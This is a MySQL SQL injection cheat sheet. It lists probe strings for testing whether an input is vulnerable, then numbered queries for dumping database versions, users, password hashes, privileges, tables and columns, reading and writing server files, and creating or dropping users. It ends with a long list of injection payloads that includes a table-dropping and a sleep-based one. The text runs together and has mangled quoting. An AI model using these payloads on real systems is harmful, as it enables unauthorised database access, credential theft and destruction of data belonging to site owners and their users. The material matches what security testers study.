SQL Injection in MySql 1' OR '1'='1 1 AND 1=1 If both give the same result, it means filtering is not there, and the database is vulnerable Dumping SQL tables 1. Get SQL version SELECT @@version 2. Get Current user SELECT user(); SELECT system_user(); 3. List all database users (not system users!) SELECT user FROM mysql.user; 4. List hash password for database users SELECT host, user, password FROM mysql.user; 5. Now, you will want to dump all privileges in the databases SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; 6. Dump DBA accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; 7. View Current database SELECT database() 8. View all databases SELECT database() 9. View columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ 10. View tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ 11. Find table by a column's name. For example you want to find a table with a column called username SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; 12. Select by row number. SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; 13. Read local file. UNION ALL SELECT LOAD_FILE(‘file location’) 14. Write to local file SELECT * FROM mytable INTO dumpfile ‘file with location’; 15. Get Hostname and IP address SELECT @@hostname; 16. Create a new user CREATE USER newuser IDENTIFIED BY ‘pass1′; 17. Delete existing user DROP USER olduser; 18. Other Injections ' " / /* # ) ( )' (' and 1=1 and 1=2 and 1>2 and 1<=2 +and+1=1 +and+1=2 +and+1>2 +and+1<=2 /**/and/**/1=1 /**/and/**/1=2 /**/and/**/1>2 /**/and/**/1<=2 'or"=' ' or'x'='x "or"x"="x ')orx=x-')or('x'='x ')or1=1-0 or 1=1 '0 or 0=0-" or 0=0-or 0=0-' or 0=0 # " or 0=0 # or 0=0# 'or 1='1 ' or 1=1-' or 1=1# ' or 1=1/* ') or '1'='1-') or ('1'='1-1' OR '1'='1 '=' ' OR 1 = 1 -- ' OR 1 -- 1 EXEC SP_ (or EXEC XP_) x';-\'; DESC users; -1\'1 1' AND non_existant_table = '1 1 AND non_existant_table = 1 ' OR username IS NOT NULL OR username = ' 1 UNI/**/ON SELECT ALL FROM WHERE ' HAVING 1=1 -' GROUP BY table.columnfromerror1 HAVING 1=1 -' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 -' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- ';DROP table sampletable;-';SELECT SLEEP(200);-UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename' AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'